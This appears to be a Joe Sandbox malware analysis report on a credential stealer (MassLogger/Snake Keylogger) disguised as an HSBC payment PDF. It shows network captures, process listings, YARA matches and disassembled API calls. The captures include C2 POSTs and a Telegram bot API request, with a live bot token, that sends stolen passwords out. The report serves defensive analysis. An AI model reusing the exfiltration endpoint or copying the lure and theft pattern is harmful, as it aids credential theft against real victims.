Dec 13, 2024 15:49:08.491862059 CET	356	OUT	POST /cuqeksdmcesun HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: xlfhhhm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:49:08.491874933 CET	850	OUT	Data Raw: fd 98 a7 c7 ae 96 b8 b1 46 03 00 00 8b 21 30 79 d1 99 64 16 1a c0 c8 45 ae a9 c4 5f 92 a2 39 5c 1a db ba 18 89 c3 eb 65 7a 50 0b c6 5a 4e 17 18 50 e9 c9 b7 3b d7 3d 28 7c 30 6b 18 75 4f 9e 54 83 9f 04 80 a4 6e 22 a8 f3 0e bf a0 06 71 74 94 38 b4 Data Ascii: F!0ydE_9\ezPZNP;=(\|0kuOTn"qt84,mCz%lgq&vWK]{QzSf"[%#K3]=Mc'dxbXi:DV?J[fEC7Qf:;Z<&t
Dec 13, 2024 15:49:10.513477087 CET	411	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:49:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=a4bccde91f706dd7b9f11de1a29522c7\|8.46.123.189\|1734101350\|1734101350\|0\|1\|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49977	13.251.16.150	80	7384	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 15:49:14.480273008 CET	356	OUT	POST /sdnqcxpiurneql HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ifsaia.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 850
Dec 13, 2024 15:49:14.480295897 CET	850	OUT	Data Raw: d2 c5 89 90 f4 0c eb 0a 46 03 00 00 fe ac 2a 65 09 a3 fb da 23 9a 27 2f 36 42 4a 7f 73 54 e9 bd 9a ea 03 95 ec e2 6f b4 75 91 41 8f ae 97 7a 7c fe a4 dc 67 7c 1d d9 6b 7e a9 d8 c6 9d bd 7b f4 4f 7b 29 44 36 85 49 d4 6e 4d 50 ca 82 17 39 f0 88 39 Data Ascii: Fe#'/6BJsTouAz\|g\|k~{O{)D6InMP9984up8",7QCH=Yp+r1P{WCBwGN5PPA]@Kq,9>m_i3jyo}pK!BrmoQlB;66l!V
Dec 13, 2024 15:49:16.493319035 CET	410	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 13 Dec 2024 14:49:16 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=fffe46b685ad6f6e3a8896f9464597a1\|8.46.123.189\|1734101356\|1734101356\|0\|1\|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=8.46.123.189; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49721	104.21.67.152	443	7744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 14:47:25 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-13 14:47:26 UTC	877	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 14:47:26 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 90015 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQq7WyUbRwt6PT9gYQc5gFNM2e481vL%2FNRaB9soz7KFJdLA9mJnquC8M315JunI%2Fe%2FQCh1CmNLCSGHbbz3qPN1U8odEh6202b7Mrot0jFiGM8H0PEW0MfChdIG%2BJdw8iiWbnXFXP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f16bfd3cc06de95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&min_rtt=1496&rtt_var=564&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1935056&cwnd=239&unsent_bytes=0&cid=87deefe8f949c862&ts=457&x=0"
2024-12-13 14:47:26 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49747	149.154.167.220	443	7744	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 14:47:33 UTC	299	OUT	POST /bot7471415635:AAEA2wRbrQkd9OwoRD_hL1tDceuiErS34CY/sendDocument?chat_id=1613755033&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd1b5b29d136df Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2024-12-13 14:47:33 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 62 35 62 32 39 64 31 33 36 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd1b5b29d136dfContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2024-12-13 14:47:34 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 13 Dec 2024 14:47:34 GMT Content-Type: application/json Content-Length: 519 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-12-13 14:47:34 UTC	519	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 32 34 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 34 37 31 34 31 35 36 33 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6f 6c 75 77 61 6d 69 6d 73 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 33 37 35 35 30 33 33 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 69 6d 73 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 31 30 31 32 35 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 2c 22 6d 69 6d 65 5f 74 Data Ascii: {"ok":true,"result":{"message_id":2244,"from":{"id":7471415635,"is_bot":true,"first_name":"oluwamims","username":"oluwamimsBot"},"chat":{"id":1613755033,"first_name":"Mims","type":"private"},"date":1734101254,"document":{"file_name":"Userdata.txt","mime_t

Target ID:	1
Start time:	09:47:14
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:	0x400000
File size:	1'561'088 bytes
MD5 hash:	81B5AFA3C4B482B020699087CBADF902
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000001.00000002.1388728173.0000000004190000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:47:14
Start date:	13/12/2024
Path:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase:	0x400000
File size:	1'445'888 bytes
MD5 hash:	D3F3792BEF47A45D62FE2257E6F0CC3A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	09:47:15
Start date:	13/12/2024
Path:	C:\Windows\System32\alg.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\alg.exe
Imagebase:	0x140000000
File size:	1'381'376 bytes
MD5 hash:	37501D1309CA59B3AC5B8B5DFADCDFD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	09:47:16
Start date:	13/12/2024
Path:	C:\Windows\System32\drivers\AppVStrm.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	138'056 bytes
MD5 hash:	BDA55F89B69757320BC125FF1CB53B26
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:47:16
Start date:	13/12/2024
Path:	C:\Windows\System32\drivers\AppvVemgr.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	174'408 bytes
MD5 hash:	E70EE9B57F8D771E2F4D6E6B535F6757
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:47:17
Start date:	13/12/2024
Path:	C:\Windows\System32\drivers\AppvVfs.sys
Wow64 process (32bit):
Commandline:
Imagebase:
File size:	154'952 bytes
MD5 hash:	2CBABD729D5E746B6BD8DC1B4B4DB1E1
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	09:47:17
Start date:	13/12/2024
Path:	C:\Windows\System32\AppVClient.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AppVClient.exe
Imagebase:	0x140000000
File size:	1'348'608 bytes
MD5 hash:	34E56361BAE3B41565C3D0351C9D6C12
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:47:18
Start date:	13/12/2024
Path:	C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\fxssvc.exe
Imagebase:	0x140000000
File size:	1'242'624 bytes
MD5 hash:	A325842411FFCF5AAC92F081FF80E1D4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:47:20
Start date:	13/12/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase:	0x140000000
File size:	2'354'176 bytes
MD5 hash:	F84F1E7B5D6E2F37D74AEEBB5944088A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	09:47:20
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
Imagebase:	0x70000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2611502749.00000000024EB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2611502749.00000000023EF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000C.00000002.2565814080.0000000000142000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	09:47:20
Start date:	13/12/2024
Path:	C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase:	0x140000000
File size:	1'512'448 bytes
MD5 hash:	63C13938F9E801F48994A09AA63E6195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:47:22
Start date:	13/12/2024
Path:	C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase:	0x140000000
File size:	1'391'616 bytes
MD5 hash:	DCA53E9AFA3D477DCEA94893FAEAD38A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	09:47:23
Start date:	13/12/2024
Path:	C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWow64\perfhost.exe
Imagebase:	0x400000
File size:	1'306'624 bytes
MD5 hash:	EE05579B3BCD384EA2133ED9493C415C
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	09:47:23
Start date:	13/12/2024
Path:	C:\Windows\System32\Locator.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\locator.exe
Imagebase:	0x140000000
File size:	1'296'896 bytes
MD5 hash:	167963C80DCE9EE0C951E410D8E5A3B4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	09:47:25
Start date:	13/12/2024
Path:	C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\SensorDataService.exe
Imagebase:	0x140000000
File size:	1'846'784 bytes
MD5 hash:	57FD8C7B7D17330D14DD1A4143FE9F84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	09:47:26
Start date:	13/12/2024
Path:	C:\Windows\System32\snmptrap.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\snmptrap.exe
Imagebase:	0x140000000
File size:	1'302'528 bytes
MD5 hash:	7DBF214BD93545C4D17CEB2B153C47D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	09:47:26
Start date:	13/12/2024
Path:	C:\Windows\System32\Spectrum.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\spectrum.exe
Imagebase:	0x140000000
File size:	1'455'616 bytes
MD5 hash:	0D216484D64532FCD0E321859356E63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	09:47:27
Start date:	13/12/2024
Path:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\OpenSSH\ssh-agent.exe
Imagebase:	0x140000000
File size:	1'667'072 bytes
MD5 hash:	4DC1351C4F632E1FA9AC4443DEC931B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	09:47:28
Start date:	13/12/2024
Path:	C:\Windows\System32\TieringEngineService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\TieringEngineService.exe
Imagebase:	0x140000000
File size:	1'611'264 bytes
MD5 hash:	A32E6301A086F4E2862EB5068342DBA7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	09:47:29
Start date:	13/12/2024
Path:	C:\Windows\System32\AgentService.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\AgentService.exe
Imagebase:	0x140000000
File size:	1'801'216 bytes
MD5 hash:	51984CA1C81E28E32EC26F59E95B9523
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	09:47:30
Start date:	13/12/2024
Path:	C:\Windows\System32\vds.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\vds.exe
Imagebase:	0x140000000
File size:	1'303'552 bytes
MD5 hash:	B57D375F949CD736B41299F19E73A57A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	11:08:18
Start date:	13/12/2024
Path:	C:\Windows\System32\wbengine.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\wbengine.exe"
Imagebase:	0x140000000
File size:	2'164'736 bytes
MD5 hash:	2FF68734C11FD98E322F8F7E5C9471FF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	3.3%
Dynamic/Decrypted Code Coverage:	50.8%
Signature Coverage:	9.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	174

Executed Functions

Function 00998140 Relevance: 62.4, APIs: 32, Strings: 2, Instructions: 2931COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,?,?,?,00995563), ref: 009981EB
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,?,00995563), ref: 00998227
GetCurrentProcess.KERNEL32(?,?,?,00995563), ref: 0099826F
GetTokenInformation.KERNELBASE(?,?,?,?,?,00995563), ref: 00998280
GetLastError.KERNEL32(?,?,?,?,00995563), ref: 0099828E

Strings

, xrefs: 00997141
j@h, xrefs: 009B423C

Memory Dump Source

Source File: 00000001.00000002.1385260628.0000000000990000.00000040.00001000.00020000.00000000.sdmp, Offset: 00990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_990000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: ProcessToken$CloseCurrentErrorHandleInformationLastOpen
String ID: $j@h
API String ID: 2078281146-3739420905
Opcode ID: 7a0a345d9ccc15450d944223f2cdab453933073c61d03626d31c8d053caa9512
Instruction ID: 26c775abf7682ea45bd42f410089be701a79b45305ab30f3d63c00ff1d7d5cd8
Opcode Fuzzy Hash: 7a0a345d9ccc15450d944223f2cdab453933073c61d03626d31c8d053caa9512
Instruction Fuzzy Hash: 09235A7190C3809BDF35CB6C8A447BABBACABA2334F4C459EE495872E2D6359D04D353

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
IsDebuggerPresent.KERNEL32 ref: 00403B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346

Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41

Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415

Strings

This is a third-party compiled AutoIt script., xrefs: 0043D279
%I, xrefs: 00403C44
runas, xrefs: 0043D33A

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1383950704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384539494.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384659636.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384711603.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384837186.00000000004EE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1384930493.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%I
API String ID: 529118366-2806069697
Opcode ID: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
Opcode Fuzzy Hash: 8a354285df3667772635141aacac326053c8f0667906653ecfa92a4f7edcf7fd
Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004049CD

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
IsWow64Process.KERNEL32(00000000), ref: 00404AA1
GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
FreeLibrary.KERNEL32(00000000), ref: 00404AF2
GetSystemInfo.KERNEL32(00000000), ref: 00404B23
GetSystemInfo.KERNEL32(00000000), ref: 00404B2F

Memory Dump Source

Source File: 00000001.00000002.1384053665.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

